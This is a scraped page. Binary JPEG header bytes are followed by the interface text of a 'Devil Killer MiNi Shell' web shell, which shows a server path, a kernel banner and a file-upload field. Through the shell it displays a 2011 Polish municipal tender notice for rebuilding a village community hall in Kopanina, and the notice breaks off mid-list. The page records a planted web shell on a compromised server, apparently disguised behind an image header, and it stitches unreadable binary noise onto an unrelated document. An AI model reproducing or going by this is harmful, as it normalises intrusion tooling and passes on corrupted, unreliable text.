JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110225/29932-N-2011.html

<p class="kh_header"><b>Lubicz: Przebudowa i rozbudowa budynku świetlicy wiejskiej w Kopaninie wraz z wyposażeniem i zagospodarowaniem terenu wokół świetlicy.</b><br>
<b>Numer ogłoszenia: 29932 - 2011; data zamieszczenia: 25.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubicz , Lubicz Dolny, ul. Toruńska 21, 87-162 Lubicz, woj. kujawsko-pomorskie, tel. +48566212100, faks +48566782122.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubicz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.lubicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i rozbudowa budynku świetlicy wiejskiej w Kopaninie wraz z wyposażeniem i zagospodarowaniem terenu wokół świetlicy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dane techniczne obiektu przed rozbudową:
- budynek parterowy, niepodpiwniczony, niski, wolnostojący;
- technologia wykonania tradycyjna, ściany murowane, słupy żelbetowe i murowane;
- stropodach konstrukcji drewnianej płaski pokryty papą asfaltową;
- posadowienie bezpośrednie, do budynku są przyłącza wodociągowe i energetyczne oraz kanały do szamba;
- odprowadzenie wód opadowych z dachu na otaczający nieutwardzony teren na przedmiotowej działce.
Dane techniczne po rozbudowie i przebudowie istniejącego budynku poprzez dobudowanie od strony południowo-wschodniej parterowego zaplecza sanitarno-higienicznego świetlicy:
powierzchnia zabudowy: 196,07 m2,
powierzchnia użytkowa: 169,71 m2,
kubatura: 856,0 m3,
wysokość: 4,97 m,
długość: 23,18 m,
szerokość (max.): 9,12 m.
Dane techniczne rozbudowy obiektu:
powierzchnia zabudowy: 30,40 m2, 
powierzchnia użytkowa: 22,61 m2, 
kubatura: 121,0 m3, 
wysokość: 4,65 m,
długość: 9,12 m,
szerokość: 3,28 m
Przyłącza, instalacje zewnętrzne:
-Należy wykonać likwidację bezodpływowego zbiornika na ścieki (zasypanie) wraz z przyłączem kanalizacji sanitarnej. Nowy zbiornik oraz przyłącze kanalizacji sanitarnej należy wykonać zgodnie z częścią graficzną projektu zagospodarowania oraz z projektem instalacji sanitarnych. Wykonać przyłącze z rur PCV o średnicy fi 160 klasy SN8. Wykonać zbiornik o pojemności 5,9 m3, z polietylenu PE, z włazem o średnicy 60 cm i klasy obciążenia A15. Należy zachować minimalną odległość 7,50 m rury wywiewnej i włazy do granicy działki sąsiedniej; Montaż zbiornika wykonać zgodnie z wytycznymi projektu i zaleceniami producenta;Zbiornik wykonać jako nieprzejezdny (zabronione jest wykonywanie jezdni nad zbiornikiem).
-Wykonać likwidację odcinka przyłącza wodociągowego wD20 (wyłączenie z użytkowania poprzez odcięcie od głównej rury wD32).
-Wykonać nowe przyłącze energetyczne kablowe zalicznikowe (wewnętrzna linia zasilająca) do budynku świetlicy wraz z demontażem istniejącego przyłącza napowietrznego (na warunkach ENERGA - OPERATOR S.A. oddział w Toruniu).
Szczegółowe dane odnośnie projektowanych urządzeń znajdują się w projektach branżowych: Place, chodniki, miejsca postojowe:
Plac przed budynkiem (nr 13):
-nawierzchnia: betonowa kostka brukowa typu starobruk o grubości 6 cm (elementy o długości 9,12 i 18 cm),
- kolor nawierzchni: szary,
- wzdłuż obrzeży chodnikowych oraz ścian budynku wykonać pas o szerokości 12 cm z kostki w kolorze czerwonym,
- krawędzie zakończyć betonowymi obrzeżami o wymiarach 100/20/6cm w kolorze szarym (od strony trawników),
- krawędzie nawierzchni pomiędzy placem i patio zakończyć betonową palisadą (elementy o przekroju kwadratowym 12x12 cm lub okrągłym fi 11 cm i wysokości 40 cm) w kolorze szarym, wystające ponad nawierzchnię o ok. 10-15 cm,
- powierzchnia 109,10 m2.
Plac przy zapleczu budynku (nr 14):
- nawierzchnia: betonowa kostka brukowa typu starobruk o grubości 6 cm (elementy o długości 9,12 i 18 cm),
- kolor nawierzchni: szary,
- wzdłuż obrzeży chodnikowych oraz ścian budynku wykonać pas o szerokości 12 cm z kostki w kolorze czerwonym,
- krawędzie zakończyć betonowymi obrzeżami o wymiarach 100/20/6cm w kolorze szarym (od strony trawników),
- powierzchnia 32,10 m2.
Patio (nr 17):
-nawierzchnia: betonowa kostka brukowa typu starobruk o grubości 6 cm (elementy o długości 9,12 i 18 cm),
- kolor nawierzchni: szary,
- wzdłuż obrzeży chodnikowych oraz ścian budynku wykonać pas o szerokości 24 cm z kostki w kolorze czerwonym,
- krawędzie zakończyć betonowymi obrzeżami o wymiarach 100/20/6cm w kolorze szarym (od strony trawników),
- krawędzie nawierzchni zakończyć betonową palisadą (elementy o przekroju kwadratowym 12x12 cm lub okrągłym fi 11 cm i o wysokości 40 cm) w kolorze szarym, wystające ponad nawierzchnię o ok. 10-15 cm,
- przy zewnętrznej i wewnętrznej krawędzi wykonać co najmniej 2 pierścienie o szerokości 24 cm  z kostki w kolorze czerwonym,
- powierzchnia 25,20 m2.
Chodniki (nr 15 i 16):
- -nawierzchnia: betonowa kostka brukowa typu starobruk o grubości 6 cm (elementy o długości 9,12 i 18 cm),
- kolor nawierzchni: szary,
- wzdłuż obrzeży chodnikowych oraz ścian budynku wykonać pas o szerokości 12 cm z kostki w kolorze czerwonym,
- krawędzie zakończyć betonowymi obrzeżami o wymiarach 100/20/6cm w kolorze szarym (od strony trawników i budynku),
- powierzchnia 17,50 m2 (nr 15) i 18,70 m2 (nr 16).
Opaska odwodnienia ścian:
- odcinki o długościach: 6,0 m (przy ścianie bocznej prawej), 15,25 m (przy ścianie tylnej), 9,12m (przy ścianie bocznej lewej),
-nawierzchnia: betonowa kostka brukowa typu starobruk o grubości 6 cm (elementy o długości 12 i 18 cm),
- kolor nawierzchni: szary,
- szerokość opaski: kostka 36 cm + obrzeże 6 cm,
- krawędzie zakończyć betonowymi obrzeżami o wymiarach 100/20/6cm w kolorze szarym (od strony trawników i budynku),
- powierzchnia 10,94 m2.
Miejsca postojowe samochodów osobowych (nr 9 i 9a):
-nawierzchnia: betonowa kostka brukowa typu cegiełka (prostokątna 10x20 cm)  o grubości 8 cm,
- kolor nawierzchni: szary,
- poszczególne miejsca postojowe wydzielić pasami o szerokości 12 cm z kostki w kolorze czerwonym,
- krawędzie zakończyć betonowymi krawężnikami drogowymi najazdowymi, prostymi i łukowymi, o szerokości 15 cm i wysokości 22 cm, w kolorze szarym (od strony trawników i budynku),
- miejsca postojowe dla samochodów osobowych wykonać o szerokości 2,50 m i długości 5,0 m,
- miejsce postojowe dla samochodu osobowego osoby niepełnosprawnej wykonać o szerokości 3,60 i długości 5,0 m
- wskaźnik miejsc postojowych na samochody osobowe:
w=10/161,79m2=0,062>wmin =1/30m3=0,033
- powierzchnia 130,50 m2,
Plac manewrowy (nr 18):
-nawierzchnia: betonowa kostka brukowa typu cegiełka (prostokątna 10x20 cm)  o grubości 8 cm,
- kolor nawierzchni: szary,
- poszczególne miejsca postojowe wydzielić pasami o szerokości 12 cm z kostki w kolorze czerwonym,
- krawędzie zakończyć betonowymi krawężnikami drogowymi najazdowymi, prostymi i łukowymi, o szerokości 15 cm i wysokości 22 cm, w kolorze szarym (od strony trawników i budynku),
- powierzchnia 249,0 m2.
Obliczone powierzchnie nawierzchni dotyczą tylko kostki brukowej.
Nawierzchnię wykonać na odpowiednio przygotowanym podłożu, która powinna składać się kolejno z następujących warstw:
a) chodniki, patio, plac przed i za budynkiem (nr 13 i 16):
- betonowa kostka brukowa o grubości 6 cm (wibroprasowana),
- podsypka cementowo-piaskowa, grubość 5 cm,
- warstwa odsączająca (wyrównawcza) z pasku, grubość 5 cm,
- zagęszczony grunt rodzimy.
b) opaska odwodnienia ścian:
- betonowa kostka brukowa o grubości 6 cm (wibroprasowana),
- podsypka cementowo-piaskowa, grubość 5 cm,
- folia izolacyjna PCV gr. 0,5 mm
- warstwa odsączająca (wyrównawcza) z pasku, grubość 5 cm,
- zagęszczony grunt rodzimy.
b) plac przy zapleczu budynku (nr 14), plac manewrowy, miejsca postojowe:
- betonowa kostka brukowa o grubości 8 cm (wibroprasowana),
- podsypka cementowo-piaskowa, grubość 5 cm,
- podbudowa z betonu C12/15 (B15) lub z zagęszczonego tłucznia, grubość minimum 12 cm,
- warstwa odsączająca z pasku, grubość 5 cm,
- zagęszczony grunt rodzimy.
Nawierzchnię miejsc postojowych i placu postojowego ukształtować ze spadkiem ok. 1 % w kierunku południowo-wschodnim i południowo-zachodnim.
Nawierzchnię pozostałych placów i chodników ukształtować ze spadkiem ok. 1 % w kierunku trawników, uwzględniając istniejące ukształtowanie terenu, które w razie potrzeby należy zniwelować.
Wykonać zlikwidowanie istniejących powierzchni utwardzonych przy budynku tj. podesty prze wejściami, schody zewnętrzne (do piwnicy i na parter).
Całość wykonać zgodnie z projektem. W zakresie doboru rodzaju i koloru kostki brukowej, obrzeży, palisady i krawężników stosować zalecenia projektu i/lub uwzględnić uwagi inwestora.
Zieleń:
Wykonać nowe nasadzenia w postaci krzewów liściastych i iglastych, roślin okrywowych, rabat kwiatowych oraz częściowa renowację trawników (zwłaszcza przed budynkiem oraz w obrębie pętli autobusowej).
Istniejące nasadzenie w formie żywopłotu przy południowo-zachodniej granicy działki należy uporządkować (uformować) oraz przedłużyć (nowe nasadzenia) na długości ok. 15 m zachowując formę żywopłotu (np. dwa rzędy po 15 szt. dereń biały).
Całość wykonać zgodnie z projektem i przy uwzględnieniu uwag inwestora.
Wyszczególnienie nowych nasadzeń:
Lp. Rodzaj nasadzenia- Ilość/sztuk
1. Dereń biały (Cornus alba) -35; 
2. Żywotnik zachodni (Thuja occidentalis L.) -30; 
3. Żywotnik zachodni Europe Gold (Thuja occidentalis L. Europe Gold)- 2;
4. Krzewuszka (Weigela Floryda Bristol Rubby) -5;
5. Cyprysiki, jałowce (w tym dwie kompozycje)- 60;
6.Rabata kwiatowa (kilkanaście sztuk roślin niższych i wyższych rodzimych gatunków wielobarwnych) -1;
7.Kompozycja krzewów liściastych i roślin okrywowych (kilkanaście sztuk roślin niższych i wyższych rodzimych gatunków).
Dodatkowe wyposażenie świetlicy wiejskiej w Kopaninie:
Rodzaj wyposażenia -Ilość szt.
1. Telewizor plazmowy 50 cali-1;
2. Odtwarzacz DVD-1;
3. Stolik na kółkach na telewizor 50 cali i na odtwarzacz DVD-1;
4. Miniwieża CD/MP3/USB-1;
5. Głośniki w systemie 5.1 (6 głośników)-1;
6. Projektor cyfrowy LCD, 2000 lumenów, komplet kabli-1;
7. Ekran projekcyjny - stacjonarny, ręcznie rozwijany, wymiary ok. 1,80x1,80 m-1;
8. Szafka multimedialna - metalowa, na kółkach, wymiary ok. 60x60 cm, wysokość ok. 95 cm, zamykana na klucz, z półką na projektor- 1;
9. Tablica suchościeralna magnetyczna - przenośna na kółkach, wymiary 1,50x1,20 m, powierzchnia lakierowana, z kompletem markerów-1;
10. Stół konferencyjny 120x100cm, metalowe nogi, blat drewniany-12;
11. Krzesło - stelaż metalowy, siedzisko i oparcie z tworzywa, tapicerowane-85;
12. Szafa na środki i sprzęt do utrzymania czystości, wymiary ok. 40x40x75 cm-1;
13. Wieszak na odzież - przyścienny, metalowy, wspornikowy (w szatni)-5;
14. Wieszak na odzież - metalowy, wolnostojący-5;
15. Kuchenka elektryczna z piekarnikiem-1;
16. Okap kuchenny wyciągowy-1;
17. Lodówka (chłodziarka) - wysokość 85 cm-1;
18. Zmywarka - biała, wymiary 60x60x85cm-1;
19. Szafki i blaty w kuchni-1;
20. Gaśnica proszkowa 6kg ABC + metalowa szafka naścienna-2;
21. Oznakowanie budynku p.poż. i ewakuacyjne, instrukcje p.poż. i bhp-1;
22. Podest sceniczny - o wymiarach ok.:
długość 3,0 m, szerokość 2,0 m, wysokość 30-35 cm, składany z mniejszych elementów, ze stopniami o wysokości do 17,5 cm, konstrukcja metalowa i drewniana, blat wodoodporny niepalny zmywalny antypoślizgowy, udźwig (nośność) min. 250 kg- 1;
23. System sygnalizacji włamania i napadu (m.in. centrala alarmowa z obudową, 4 czujniki ruchu podczerwieni, 3 czujniki otwarcia drzwi, sygnalizator zewnętrzny) wraz z montażem	-1.
Dodatkowe wyposażenie terenu działki świetlicy wiejskiej w Kopaninie:
1. Ławka - drewniana z bali z oparciem przenośna;
wymiary ok. dł. 1,8 m szer. 0,50 m, wys. 0,85 m -szt.3;
2. Kosz na śmieci - drewniany z półwałków, średnica kosza 0,47 m, wys. kosza 1,0 m -szt.3;
3. Stojak rowerowy metalowy na 5-6 stanowisk -szt.1;
4. Tablica informacyjna -wolnostojąca, jednostronna, konstrukcja metalowa zamykana, oszklenie z twardego przezroczystego tworzywa wys. gabloty ok. 1,0m szer.	gabloty ok. 0,7m -szt.1..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 45.26.28.00-9, 45.11.12.91-4, 45.45.00.00-6, 45.31.56.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia WADIUM  na podstawie art. 45 Pzp w wysokości 16.000 zł, wniesione w formie zgodnie z art. 45 pkt 6 Pzp w terminie złożenia oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi:
1)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają  wpisu do rejestru, w celu wykazania braku podstaw  do wykluczenia  w oparciu o art.24 ust .1     pkt.2 ustawy, wystawiony nie wcześniej  niż 6 miesięcy  przed upływem  terminu  składania wniosków  o dopuszczenie do udziału  w postępowaniu  o udzielenie  zamówienia albo składania  ofert, a w stosunku do osób fizycznych  oświadczenia w zakresie  art.24 ust.1 pkt.2 ustawy.
2)	złoży oświadczenie w trybie art.22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi: 
1)	potwierdzenie wykonania w ciągu ostatnich  5 lat co najmniej  trzech inwestycji o podobnej złożoności i charakterze tzn. wykonał budynki o zbliżonej kubaturze/ odpowiadające swoim rodzajem przedmiotowi zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, przynajmniej 1 roboty o podobnej złożoności i charakterze.  
Ocena spełnienia dokonana będzie na podstawie dołączonego do oferty  (załącznik nr 4): wykazu ważniejszych inwestycji w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu, że roboty te zostały wykonane lub są wykonywane należycie; /referencje/.
(W przypadku wspólnego ubiegania się dwóch i więcej wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie i kwalifikacje).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostane uznany za spełniony jeżeli wykonawca przedstawi:
dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. ( kserokopię uprawnień budowlanych   oraz aktualne zaświadczenie o wpisie na listę członków Okręgowej Izby Inżynierów Budownictwa - obowiązkowo muszą być dołączone do oferty) . Ocena spełnienia dokonana zostanie na podstawie danych z załącznika nr 3 i kompletności dołączonych dokumentów.
2)	złoży oświadczenie w trybie art. 22 ust.1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo  zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>(W przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa, przy czym oświadczenie z art. 22 składa każdy z nich).
Warunek zostaje uznany za spełniony na podstawie :
1)	Opłaconej polisy w przypadku braku lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość co najmniej  500.000 tys. zł.
2)	oświadczenia złożonego w trybie art. 22 ust.1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
